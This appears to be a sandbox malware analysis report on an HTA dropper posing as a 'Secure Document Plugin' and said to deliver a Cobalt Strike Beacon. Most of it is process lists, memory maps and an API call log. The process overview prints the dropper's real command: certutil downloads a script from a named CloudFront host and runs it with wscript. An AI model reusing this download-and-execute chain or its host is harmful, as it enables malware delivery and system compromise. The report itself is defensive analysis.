Cobalt Strike Beacon dropped by HTML Application (HTA) | Sequential Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win10_64 | html_application
Classification: Trojan, Keylogger, Downloader

d8ef1c4f64a05b1abf100044fcb7048c9526d175a114cb90bd134b80783da146 (SHA256)

Secure_Document_Plugin.hta

HTML Application

Created at 2018-02-15 18:28:00

Notifications (2/3)

Some memory dumps may be missing in the reports since the maximum number of dumps was reached during the analysis. You can increase the limit in the configuration settings.

Some memory dumps may be missing in the reports since the total dump size limit was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "11 minutes, 47 seconds" to "8 minutes, 50 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x700 Analysis Target High (Elevated) mshta.exe "C:\Windows\System32\mshta.exe" "C:\Users\CIIHMN~1\Desktop\SECURE~1.HTA" -
#2 0x32c RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#3 0xae8 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#4 0xc40 Child Process High (Elevated) cmd.exe cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js && wscript.exe C:\Users\Public\en-US.js #3
#6 0xcf4 Child Process High (Elevated) certutil.exe certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\Users\Public\en-US.js #4
#7 0x33c Child Process High (Elevated) wscript.exe wscript.exe C:\Users\Public\en-US.js #4
#8 0xc84 Child Process High (Elevated) explorer.exe "C:\Windows\SysWOW64\explorer.exe" #7
#13 0xac4 Child Process High (Elevated) rundll32.exe C:\Windows\syswow64\rundll32.exe #8

Behavior Information - Sequential View

Process #1: mshta.exe
450 0
»
Information Value
ID #1
File Name c:\windows\system32\mshta.exe
Command Line "C:\Windows\System32\mshta.exe" "C:\Users\CIIHMN~1\Desktop\SECURE~1.HTA"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:27, Reason: Analysis Target
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:10:06
OS Process Information
»
Information Value
PID 0x700
Parent PID 0x728 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 210
0x CA4
0x C9C
0x CB8
0x CC0
0x CBC
0x CC8
0x CC4
0x CD0
0x CCC
0x 9CC
0x CF8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000b8a88f0000 0xb8a88f0000 0xb8a890ffff Private Memory Readable, Writable True True False
pagefile_0x000000b8a88f0000 0xb8a88f0000 0xb8a88fffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000b8a8900000 0xb8a8900000 0xb8a8906fff Private Memory Readable, Writable True True False
pagefile_0x000000b8a8910000 0xb8a8910000 0xb8a8923fff Pagefile Backed Memory Readable True False False -
private_0x000000b8a8930000 0xb8a8930000 0xb8a8a2ffff Private Memory Readable, Writable True True False
pagefile_0x000000b8a8a30000 0xb8a8a30000 0xb8a8a33fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a8a40000 0xb8a8a40000 0xb8a8a40fff Pagefile Backed Memory Readable True False False -
private_0x000000b8a8a50000 0xb8a8a50000 0xb8a8a51fff Private Memory Readable, Writable True True False
locale.nls 0xb8a8a60000 0xb8a8b1dfff Memory Mapped File Readable False False False -
private_0x000000b8a8b20000 0xb8a8b20000 0xb8a8b26fff Private Memory Readable, Writable True True False
imm32.dll 0xb8a8b30000 0xb8a8b63fff Memory Mapped File Readable False False False -
mshta.exe.mui 0xb8a8b30000 0xb8a8b30fff Memory Mapped File Readable False False False -
private_0x000000b8a8b40000 0xb8a8b40000 0xb8a8b40fff Private Memory Readable, Writable True True False
private_0x000000b8a8b50000 0xb8a8b50000 0xb8a8b50fff Private Memory Readable, Writable True True False
private_0x000000b8a8b60000 0xb8a8b60000 0xb8a8b7ffff Private Memory Readable, Writable True True False
private_0x000000b8a8b80000 0xb8a8b80000 0xb8a8b80fff Private Memory Readable, Writable True True False
pagefile_0x000000b8a8b90000 0xb8a8b90000 0xb8a8b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a8b90000 0xb8a8b90000 0xb8a8b93fff Pagefile Backed Memory Readable True False False -
private_0x000000b8a8ba0000 0xb8a8ba0000 0xb8a8ba6fff Private Memory Readable, Writable True True False
pagefile_0x000000b8a8bb0000 0xb8a8bb0000 0xb8a8bb0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a8bc0000 0xb8a8bc0000 0xb8a8bc0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a8bd0000 0xb8a8bd0000 0xb8a8bd0fff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0xb8a8be0000 0xb8a8be0fff Memory Mapped File Readable False False False -
pagefile_0x000000b8a8be0000 0xb8a8be0000 0xb8a8be0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000b8a8bf0000 0xb8a8bf0000 0xb8a8bf1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a8c00000 0xb8a8c00000 0xb8a8c01fff Pagefile Backed Memory Readable True False False -
private_0x000000b8a8c10000 0xb8a8c10000 0xb8a8d0ffff Private Memory Readable, Writable True True False
private_0x000000b8a8d10000 0xb8a8d10000 0xb8a8e0ffff Private Memory Readable, Writable True True False
pagefile_0x000000b8a8e10000 0xb8a8e10000 0xb8a8f97fff Pagefile Backed Memory Readable True False False -
private_0x000000b8a8fa0000 0xb8a8fa0000 0xb8a8feffff Private Memory Readable, Writable True True False
private_0x000000b8a8ff0000 0xb8a8ff0000 0xb8a8ffffff Private Memory Readable, Writable True True False
private_0x000000b8a9000000 0xb8a9000000 0xb8a90fffff Private Memory Readable, Writable True True False
pagefile_0x000000b8a9100000 0xb8a9100000 0xb8a9280fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000b8a9290000 0xb8a9290000 0xb8aa68ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0xb8aa690000 0xb8aa9c6fff Memory Mapped File Readable False False False -
private_0x000000b8aa9d0000 0xb8aa9d0000 0xc0aa9cffff Private Memory Readable, Writable True False False -
private_0x000000c0aa9d0000 0xc0aa9d0000 0xc0aaacffff Private Memory Readable, Writable True True False
private_0x000000c0aaad0000 0xc0aaad0000 0xc0aabeffff Private Memory Readable, Writable True True False
private_0x000000c0aaad0000 0xc0aaad0000 0xc0aabcffff Private Memory Readable, Writable True True False
pagefile_0x000000c0aabd0000 0xc0aabd0000 0xc0aabd0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000c0aabe0000 0xc0aabe0000 0xc0aabeffff Private Memory Readable, Writable True True False
oleaut32.dll 0xc0aabf0000 0xc0aacacfff Memory Mapped File Readable False False False -
rpcss.dll 0xc0aabf0000 0xc0aacc5fff Memory Mapped File Readable False False False -
private_0x000000c0aabf0000 0xc0aabf0000 0xc0aacfffff Private Memory Readable, Writable True True False
pagefile_0x000000c0aabf0000 0xc0aabf0000 0xc0aaca7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000c0aacb0000 0xc0aacb0000 0xc0aacb0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000c0aacc0000 0xc0aacc0000 0xc0aacc0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000c0aacd0000 0xc0aacd0000 0xc0aacd0fff Pagefile Backed Memory Readable True False False -
oleaccrc.dll 0xc0aacd0000 0xc0aacd1fff Memory Mapped File Readable False False False -
pagefile_0x000000c0aace0000 0xc0aace0000 0xc0aace0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000c0aace0000 0xc0aace0000 0xc0aaceffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000c0aacf0000 0xc0aacf0000 0xc0aacfffff Private Memory Readable, Writable True True False
private_0x000000c0aad00000 0xc0aad00000 0xc0aadfffff Private Memory Readable, Writable True True False
private_0x000000c0aae00000 0xc0aae00000 0xc0aaefffff Private Memory Readable, Writable True True False
private_0x000000c0aaf00000 0xc0aaf00000 0xc0aaffffff Private Memory Readable, Writable True True False
private_0x000000c0ab000000 0xc0ab000000 0xc0ab0fffff Private Memory Readable, Writable True True False
private_0x000000c0ab100000 0xc0ab100000 0xc0ab1fffff Private Memory Readable, Writable True True False
private_0x000000c0ab200000 0xc0ab200000 0xc0ab2fffff Private Memory Readable, Writable True True False
private_0x000000c0ab300000 0xc0ab300000 0xc0ab3fffff Private Memory Readable, Writable True True False
mshtml.dll.mui 0xc0ab400000 0xc0ab43afff Memory Mapped File Readable False False False -
pagefile_0x000000c0ab440000 0xc0ab440000 0xc0ab469fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000c0ab470000 0xc0ab470000 0xc0ab470fff Private Memory Readable, Writable True True False
private_0x000000c0ab480000 0xc0ab480000 0xc0ab480fff Private Memory Readable, Writable True True False
private_0x000000c0ab490000 0xc0ab490000 0xc0ab58ffff Private Memory Readable, Writable True True False
~fontcache-system.dat 0xc0ab590000 0xc0ab605fff Memory Mapped File Readable False False False -
~fontcache-fontface.dat 0xc0ab610000 0xc0ac60ffff Memory Mapped File Readable False False False -
~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat 0xc0ac610000 0xc0ace0ffff Memory Mapped File Readable False False False -
counters.dat 0xc0ace10000 0xc0ace10fff Memory Mapped File Readable, Writable True True False
pagefile_0x000000c0ace20000 0xc0ace20000 0xc0ace21fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000c0ace20000 0xc0ace20000 0xc0ad0b2fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000c0ace20000 0xc0ace20000 0xc0ace3ffff Private Memory Readable, Writable True True False
private_0x000000c0ace40000 0xc0ace40000 0xc0ace8ffff Private Memory Readable, Writable True True False
private_0x000000c0ace90000 0xc0ace90000 0xc0aceaffff Private Memory Readable, Writable True True False
private_0x000000c0ad0c0000 0xc0ad0c0000 0xc0ad0dffff Private Memory Readable, Writable True True False
private_0x000000c0ad110000 0xc0ad110000 0xc0ad20ffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ffa50000 0x7df5ffa50000 0x7ff5ffa4ffff Pagefile Backed Memory - True False False -
private_0x00007ff722894000 0x7ff722894000 0x7ff722895fff Private Memory Readable, Writable True True False
private_0x00007ff722896000 0x7ff722896000 0x7ff722897fff Private Memory Readable, Writable True True False
private_0x00007ff722898000 0x7ff722898000 0x7ff722899fff Private Memory Readable, Writable True True False
private_0x00007ff72289a000 0x7ff72289a000 0x7ff72289bfff Private Memory Readable, Writable True True False
private_0x00007ff72289c000 0x7ff72289c000 0x7ff72289dfff Private Memory Readable, Writable True True False
private_0x00007ff72289e000 0x7ff72289e000 0x7ff72289ffff Private Memory Readable, Writable True True False
pagefile_0x00007ff7228a0000 0x7ff7228a0000 0x7ff72299ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff7229a0000 0x7ff7229a0000 0x7ff7229c2fff Pagefile Backed Memory Readable True False False -
private_0x00007ff7229c3000 0x7ff7229c3000 0x7ff7229c4fff Private Memory Readable, Writable True True False
private_0x00007ff7229c5000 0x7ff7229c5000 0x7ff7229c5fff Private Memory Readable, Writable True True False
private_0x00007ff7229c6000 0x7ff7229c6000 0x7ff7229c7fff Private Memory Readable, Writable True True False
private_0x00007ff7229c8000 0x7ff7229c8000 0x7ff7229c9fff Private Memory Readable, Writable True True False
private_0x00007ff7229ca000 0x7ff7229ca000 0x7ff7229cbfff Private Memory Readable, Writable True True False
private_0x00007ff7229cc000 0x7ff7229cc000 0x7ff7229cdfff Private Memory Readable, Writable True True False
private_0x00007ff7229ce000 0x7ff7229ce000 0x7ff7229cffff Private Memory Readable, Writable True True False
mshta.exe 0x7ff7237f0000 0x7ff7237f7fff Memory Mapped File Readable, Writable, Executable True False False -
mshtml.dll 0x7ffb223a0000 0x7ffb23b28fff Memory Mapped File Readable, Writable, Executable True False False -
vbscript.dll 0x7ffb250d0000 0x7ffb25161fff Memory Mapped File Readable, Writable, Executable True False False -
wbemdisp.dll 0x7ffb25340000 0x7ffb25394fff Memory Mapped File Readable, Writable, Executable True False False -
msimtf.dll 0x7ffb26100000 0x7ffb2610ffff Memory Mapped File Readable, Writable, Executable False False False -
wldp.dll 0x7ffb2bea0000 0x7ffb2beaffff Memory Mapped File Readable, Writable, Executable False False False -
dataexchange.dll 0x7ffb2cea0000 0x7ffb2cee5fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x7ffb2cef0000 0x7ffb2cf58fff Memory Mapped File Readable, Writable, Executable False False False -
msls31.dll 0x7ffb2dcd0000 0x7ffb2dd07fff Memory Mapped File Readable, Writable, Executable False False False -
mpoav.dll 0x7ffb2dd10000 0x7ffb2dd2cfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffb2e4a0000 0x7ffb2e4b0fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffb2e5a0000 0x7ffb2e846fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffb2ea50000 0x7ffb2ebe6fff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ffb30c90000 0x7ffb30c9ffff Memory Mapped File Readable, Writable, Executable False False False -
dwrite.dll 0x7ffb314d0000 0x7ffb31728fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffb318d0000 0x7ffb318d9fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffb31aa0000 0x7ffb31e15fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffb33330000 0x7ffb333aefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x7ffb34cc0000 0x7ffb34f33fff Memory Mapped File Readable, Writable, Executable False False False -
d2d1.dll 0x7ffb355d0000 0x7ffb35b14fff Memory Mapped File Readable, Writable, Executable False False False -
d3d10warp.dll 0x7ffb377f0000 0x7ffb37a5dfff Memory Mapped File Readable, Writable, Executable False False False -
dxgi.dll 0x7ffb37bf0000 0x7ffb37c8bfff Memory Mapped File Readable, Writable, Executable False False False -
d3d11.dll 0x7ffb37c90000 0x7ffb37f32fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffb37f40000 0x7ffb37f61fff Memory Mapped File Readable, Writable, Executable False False False -
dcomp.dll 0x7ffb381a0000 0x7ffb38270fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffb38610000 0x7ffb386a5fff Memory Mapped File Readable, Writable, Executable False False False -
twinapi.appcore.dll 0x7ffb387f0000 0x7ffb388ddfff Memory Mapped File Readable, Writable, Executable False False False -
rmclient.dll 0x7ffb38970000 0x7ffb38997fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ffb39350000 0x7ffb3936efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb39960000 0x7ffb3998bfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x7ffb39c00000 0x7ffb39c97fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffb39d40000 0x7ffb39d50fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffb39de0000 0x7ffb3a407fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffb3a460000 0x7ffb3a4b3fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffb3a570000 0x7ffb3a622fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffb3a630000 0x7ffb3a7f0fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffb3a9e0000 0x7ffb3a9e7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffb3a9f0000 0x7ffb3aa40fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffb3aa50000 0x7ffb3bf74fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffb3c290000 0x7ffb3c2c5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb3c570000 0x7ffb3c5d8fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb3ca70000 0x7ffb3cb14fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffb3cb20000 0x7ffb3cc60fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffb3d020000 0x7ffb3d17bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 9 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\inetcache\counters.dat 0.12 KB MD5: facb92e802657acec0e601099feda01f
SHA1: a9c28f5f7652f67547a6aed28cf5b749d6a10523
SHA256: e5bf4e0df2157904a32ea3c903931640cabadbe0cd21b5c4ecced2087d4b1d3f
False
Threads
Thread 0x210
432 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffb3d280f40 True 1
Fn
Module Load module_name = WLDP.DLL, base_address = 0x7ffb2bea0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffb2bea1010 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ True 1
Fn
Module Load module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7ffb223a0000 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = JS_DEBUG_SCOPE False 1
Fn
Module Get Handle module_name = c:\windows\system32\ntdll.dll, base_address = 0x7ffb3d310000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ntdll.dll, function = RtlGetDeviceFamilyInfoEnum, address_out = 0x7ffb3d383930 True 1
Fn
Debug Check for Presence c:\windows\system32\mshta.exe True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler False 1
Fn
Module Get Handle module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 True 1
Fn
System Get Time type = Ticks, time = 110406 True 2
Fn
Module Load module_name = ntdll.dll, base_address = 0x7ffb3d310000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x7ffb3c2d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, address_out = 0x7ffb3d31e180 True 1
Fn
Module Load module_name = api-ms-win-downlevel-ole32-l1-1-0.dll, base_address = 0x7ffb3cc70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, address_out = 0x7ffb3cce2340 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x7ffb2ea50000 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CoInternetIsFeatureEnabled, address_out = 0x7ffb2ea86410 True 1
Fn
System Get Info type = Operating System True 1
Fn
Ini Read file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 True 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID True 1
Fn
File Open Mapping filename = #MSHTML#PERF#00000700, desired_access = FILE_MAP_WRITE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE, value_name = Path, type = REG_NONE True 1
Fn
Module Get Handle module_name = c:\windows\system32\mshta.exe, base_address = 0x7ff7237f0000 True 1
Fn
Module Get Filename module_name = c:\windows\system32\mshta.exe, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility, value_name = mshta.exe, type = REG_NONE False 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x7ffb3d2821f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\mshtml.dll, function = RunHTMLApplication, address_out = 0x7ffb22da4930 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x7ffb3cb20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = OleInitialize, address_out = 0x7ffb3cb2ee90 True 1
Fn
Window Create class_name = HTML Application Host Window Class, wndproc_parameter = 140716610051360 True 1
Fn
Window Create class_name = HTML Application Host Window Class, wndproc_parameter = 140716610051360 True 1
Fn
Window Set Attribute class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x7ffb3a9f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveArgsW, address_out = 0x7ffb3a9fbe60 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CreateURLMonikerEx, address_out = 0x7ffb2ea74fe0 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoCreateInstance, address_out = 0x7ffb3ccf7000 True 1
Fn
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = CoIncrementMTAUsage, address_out = 0x7ffb3cd38bd0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x7ffb3c650000 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = SetCoalescableTimer, address_out = 0x7ffb3c67fdd0 True 1
Fn
Module Load module_name = UxTheme.dll, base_address = 0x7ffb38610000 True 1
Fn
Module Get Address module_name = c:\windows\system32\uxtheme.dll, address_out = 0x7ffb386128c0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x7ffb34cc0000 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Ini Read file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 True 1
Fn
Ini Read file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 True 1
Fn
Ini Read file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 True 1
Fn
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu False 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CoInternetCreateSecurityManager, address_out = 0x7ffb2ea61c00 True 1
Fn
Ini Read file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 520, address_out = 0x7ffb2ea6b520 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 444, address_out = 0x7ffb2ea98500 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 521, address_out = 0x7ffb2ea6b870 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoTaskMemAlloc, address_out = 0x7ffb3cd20ff0 True 1
Fn
System Get Time type = Ticks, time = 113187 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x7ffb3c9b0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x7ffb3ca39910 True 1
Fn
Module Load module_name = api-ms-win-downlevel-shlwapi-l2-1-0.dll, base_address = 0x7ffb3a570000 True 1
Fn
Module Get Address module_name = c:\windows\system32\shcore.dll, function = IUnknown_QueryService, address_out = 0x7ffb3a5a4b50 True 1
Fn
Module Get Address module_name = c:\windows\system32\shlwapi.dll, function = 29, address_out = 0x7ffb3aa04720 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoTaskMemFree, address_out = 0x7ffb3cd21110 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x7ffb3c9bf120 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x7ffb3c9c6aa0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 519, address_out = 0x7ffb2ea6bbc0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 485, address_out = 0x7ffb2eaa3980 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID_NAME, result_out = 00000409 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CoInternetGetSession, address_out = 0x7ffb2ea89250 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x7ffb2ea50000 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 471, address_out = 0x7ffb2eaa9f00 True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:21 (UTC) True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CoInternetParseIUri, address_out = 0x7ffb2eaab3c0 True 1
Fn
Module Get Address module_name = c:\windows\system32\shcore.dll, function = SHStrDupW, address_out = 0x7ffb3a59cb70 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = CoInternetIsFeatureEnabledForUrl, address_out = 0x7ffb2ea87ed0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = ReleaseBindInfo, address_out = 0x7ffb2eaab310 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = FindMimeFromData, address_out = 0x7ffb2ea89ec0 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 446, address_out = 0x7ffb2ea9b950 True 1
Fn
COM Create interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD True 1
Fn
Window Create wndproc_parameter = 827497414656 True 1
Fn
Module Load module_name = ext-ms-win-ntuser-touch-hittest-l1-1-0.dll, base_address = 0x7ffb3c650000 True 1
Fn
